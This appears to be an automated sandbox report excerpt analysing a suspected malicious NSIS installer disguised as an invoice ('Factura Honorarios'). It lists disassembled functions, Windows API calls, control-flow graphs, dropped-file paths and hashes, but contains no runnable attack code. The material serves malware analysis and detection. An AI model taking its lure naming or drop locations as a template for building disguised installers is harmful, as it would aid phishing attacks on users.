                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$C:\Users\user\Desktop$C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3441113951-3260626628
                                                                                                                                  • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                                                                  • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                                                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                                                                                                  Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 164 405531-405534 141->164 165 405515-40552f SendMessageW * 2 141->165 146 405631-40563b 143->146 147 405615-40561b 143->147 144->143 150 405691-405695 146->150 151 40563d-405643 146->151 148 405656-40565f call 404262 147->148 149 40561d-40562c ShowWindow * 2 call 404230 147->149 161 405664-405668 148->161 149->146 150->148 158 405697-40569d 150->158 154 405645-405651 call 4041d4 151->154 155 40566b-40567b ShowWindow 151->155 154->148 162 40568b-40568c call 4041d4 155->162 163 40567d-405686 call 4052ec 155->163 158->148 159 40569f-4056b2 SendMessageW 158->159 166 4057b4-4057b6 159->166 167 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 159->167 162->150 163->162 168 405544-40555b call 4041fb 164->168 169 405536-405542 SendMessageW 164->169 165->164 166->161 176 4056e5-4056f5 GetWindowRect 167->176 177 4056f8-40570d TrackPopupMenu 167->177 178 405591-4055b2 GetDlgItem SendMessageW 168->178 179 40555d-405571 ShowWindow 168->179 169->168 176->177 177->166 180 405713-40572a 177->180 178->166 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->166 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->166
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                                                    • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405673
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                                                  • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                                                  • EmptyClipboard.USER32 ref: 00405753
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                                                                  • CloseClipboard.USER32 ref: 004057AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {$6B
                                                                                                                                  • API String ID: 590372296-3705917127
                                                                                                                                  • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                                                                  • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                                                                  • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                                                                                                  • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                                                                                                  Function 6FF41B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6FF4121B: GlobalAlloc.KERNEL32(00000040,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FF41C6F
                                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 6FF41CB7
                                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 6FF41CC1
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41CD4
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41DB6
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41DBB
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41DC0
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41FAA
                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6FF42144
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 6FF421B9
                                                                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 6FF421CA
                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FF42224
                                                                                                                                  • lstrlenW.KERNEL32(00000808), ref: 6FF4223E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 245916457-0
                                                                                                                                  • Opcode ID: 39d64beec636e7f1eb547bf3d193b6a3a21aa9026d89877a589d1899e46ecd58
                                                                                                                                  • Instruction ID: 0e435ed81fc1da5c2e87cf2acb6e245cd7e9388d1b4b84b16204fca037b22037
                                                                                                                                  • Opcode Fuzzy Hash: 39d64beec636e7f1eb547bf3d193b6a3a21aa9026d89877a589d1899e46ecd58
                                                                                                                                  • Instruction Fuzzy Hash: 5C22BF72D14609DADB11CFB8C9806EEBFF0FF05315F10462AD1A5E7292E77466A1CB50
                                                                                                                                  Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 712 405996-4059bc call 405c61 715 4059d5-4059dc 712->715 716 4059be-4059d0 DeleteFileW 712->716 718 4059de-4059e0 715->718 719 4059ef-4059ff call 406284 715->719 717 405b52-405b56 716->717 721 405b00-405b05 718->721 722 4059e6-4059e9 718->722 725 405a01-405a0c lstrcatW 719->725 726 405a0e-405a0f call 405ba5 719->726 721->717 724 405b07-405b0a 721->724 722->719 722->721 727 405b14-405b1c call 4065c7 724->727 728 405b0c-405b12 724->728 729 405a14-405a18 725->729 726->729 727->717 736 405b1e-405b32 call 405b59 call 40594e 727->736 728->717 732 405a24-405a2a lstrcatW 729->732 733 405a1a-405a22 729->733 735 405a2f-405a4b lstrlenW FindFirstFileW 732->735 733->732 733->735 737 405a51-405a59 735->737 738 405af5-405af9 735->738 754 405b34-405b37 736->754 755 405b4a-405b4d call 4052ec 736->755 741 405a79-405a8d call 406284 737->741 742 405a5b-405a63 737->742 738->721 740 405afb 738->740 740->721 752 405aa4-405aaf call 40594e 741->752 753 405a8f-405a97 741->753 744 405a65-405a6d 742->744 745 405ad8-405ae8 FindNextFileW 742->745 744->741 749 405a6f-405a77 744->749 745->737 748 405aee-405aef FindClose 745->748 748->738 749->741 749->745 765 405ad0-405ad3 call 4052ec 752->765 766 405ab1-405ab4 752->766 753->745 757 405a99-405aa2 call 405996 753->757 754->728 756 405b39-405b48 call 4052ec call 40604a 754->756 755->717 756->717 757->745 765->745 768 405ab6-405ac6 call 4052ec call 40604a 766->768 769 405ac8-405ace 766->769 768->745 769->745
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059BF
                                                                                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A07
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A2A
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A30
                                                                                                                                  • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A40
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                                                                  Strings
                                                                                                                                  • \*.*, xrefs: 00405A01
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                                                                                  • "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe", xrefs: 00405996
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                  • API String ID: 2035342205-1704863889
                                                                                                                                  • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                                                                  • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                                                                                  • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                                                                  • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                                                                                  Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 996 40698e-406993 997 406a04-406a22 996->997 998 406995-4069c4 996->998 999 406ffa-40700f 997->999 1000 4069c6-4069c9 998->1000 1001 4069cb-4069cf 998->1001 1005 407011-407027 999->1005 1006 407029-40703f 999->1006 1002 4069db-4069de 1000->1002 1003 4069d1-4069d5 1001->1003 1004 4069d7 1001->1004 1007 4069e0-4069e9 1002->1007 1008 4069fc-4069ff 1002->1008 1003->1002 1004->1002 1009 407042-407049 1005->1009 1006->1009 1012 4069eb 1007->1012 1013 4069ee-4069fa 1007->1013 1014 406bd1-406bef 1008->1014 1010 407070-40707c 1009->1010 1011 40704b-40704f 1009->1011 1021 406812-40681b 1010->1021 1015 407055-40706d 1011->1015 1016 4071fe-407208 1011->1016 1012->1013 1018 406a64-406a92 1013->1018 1019 406bf1-406c05 1014->1019 1020 406c07-406c19 1014->1020 1015->1010 1024 407214-407227 1016->1024 1022 406a94-406aac 1018->1022 1023 406aae-406ac8 1018->1023 1025 406c1c-406c26 1019->1025 1020->1025 1028 406821 1021->1028 1029 407229 1021->1029 1031 406acb-406ad5 1022->1031 1023->1031 1030 40722c-407230 1024->1030 1026 406c28 1025->1026 1027 406bc9-406bcf 1025->1027 1032 406ba4-406ba8 1026->1032 1033 406d39-406d46 1026->1033 1027->1014 1038 406b6d-406b77 1027->1038 1034 406828-40682c 1028->1034 1035 406968-406989 1028->1035 1036 4068cd-4068d1 1028->1036 1037 40693d-406941 1028->1037 1029->1030 1039 406adb 1031->1039 1040 406a4c-406a52 1031->1040 1048 4071b0-4071ba 1032->1048 1049 406bae-406bc6 1032->1049 1033->1021 1034->1024 1041 406832-40683f 1034->1041 1035->999 1051 4068d7-4068f0 1036->1051 1052 40717d-407187 1036->1052 1042 406947-40695b 1037->1042 1043 40718c-407196 1037->1043 1044 4071bc-4071c6 1038->1044 1045 406b7d-406b9f 1038->1045 1057 406a31-406a49 1039->1057 1058 407198-4071a2 1039->1058 1046 406b05-406b0b 1040->1046 1047 406a58-406a5e 1040->1047 1041->1029 1056 406845-40688b 1041->1056 1059 40695e-406966 1042->1059 1043->1024 1044->1024 1045->1033 1054 406b69 1046->1054 1055 406b0d-406b2b 1046->1055 1047->1018 1047->1054 1048->1024 1049->1027 1053 4068f3-4068f7 1051->1053 1052->1024 1053->1036 1060 4068f9-4068ff 1053->1060 1054->1038 1061 406b43-406b55 1055->1061 1062 406b2d-406b41 1055->1062 1063 4068b3-4068b5 1056->1063 1064 40688d-406891 1056->1064 1057->1040 1058->1024 1059->1035 1059->1037 1065 406901-406908 1060->1065 1066 406929-40693b 1060->1066 1067 406b58-406b62 1061->1067 1062->1067 1070 4068c3-4068cb 1063->1070 1071 4068b7-4068c1 1063->1071 1068 406893-406896 GlobalFree 1064->1068 1069 40689c-4068aa GlobalAlloc 1064->1069 1072 406913-406923 GlobalAlloc 1065->1072 1073 40690a-40690d GlobalFree 1065->1073 1066->1059 1067->1046 1074 406b64 1067->1074 1068->1069 1069->1029 1075 4068b0 1069->1075 1070->1053 1071->1070 1071->1071 1072->1029 1072->1066 1073->1072 1077 4071a4-4071ae 1074->1077 1078 406aea-406b02 1074->1078 1075->1063 1077->1024 1078->1046
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                                  • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                                                                                  • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                                  • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                                                                                  Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,75573420,004059B6,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 004065D2
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID: 8gB
                                                                                                                                  • API String ID: 2295610775-1733800166
                                                                                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                                                                  Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 193 403ed3-403ee8 191->193 194 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->194 192->191 195 403d46-403d4f 192->195 197 403f28-403f2d call 404247 193->197 198 403eea-403eed 193->198 194->193 199 403d51-403d5e SetWindowPos 195->199 200 403d64-403d67 195->200 212 403f32-403f4d 197->212 204 403f20-403f22 198->204 205 403eef-403efa call 401389 198->205 199->200 201 403d81-403d87 200->201 202 403d69-403d7b ShowWindow 200->202 207 403da3-403da6 201->207 208 403d89-403d9e DestroyWindow 201->208 202->201 204->197 211 4041c8 204->211 205->204 227 403efc-403f1b SendMessageW 205->227 216 403da8-403db4 SetWindowLongW 207->216 217 403db9-403dbf 207->217 213 4041a5-4041ab 208->213 215 4041ca-4041d1 211->215 219 403f56-403f5c 212->219 220 403f4f-403f51 call 40140b 212->220 213->211 222 4041ad-4041b3 213->222 216->215 225 403e62-403e70 call 404262 217->225 226 403dc5-403dd6 GetDlgItem 217->226 223 403f62-403f6d 219->223 224 404186-40419f DestroyWindow EndDialog 219->224 220->219 222->211 228 4041b5-4041be ShowWindow 222->228 223->224 229 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 223->229 224->213 225->215 230 403df5-403df8 226->230 231 403dd8-403def SendMessageW IsWindowEnabled 226->231 227->215 228->211 260 403fc2-403fc7 229->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 229->261 234 403dfa-403dfb 230->234 235 403dfd-403e00 230->235 231->211 231->230 238 403e2b-403e30 call 4041d4 234->238 239 403e02-403e08 235->239 240 403e0e-403e13 235->240 238->225 243 403e49-403e5c SendMessageW 239->243 244 403e0a-403e0c 239->244 240->243 245 403e15-403e1b 240->245 243->225 244->238 246 403e32-403e3b call 40140b 245->246 247 403e1d-403e23 call 40140b 245->247 246->225 257 403e3d-403e47 246->257 256 403e29 247->256 256->238 257->256 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->212 280 40409b-40409d 269->280 280->212 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->213 285 4040e0-40410d CreateDialogParamW 282->285 283->211 284 4040b5-4040bb 283->284 284->212 286 4040c1 284->286 285->213 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->213
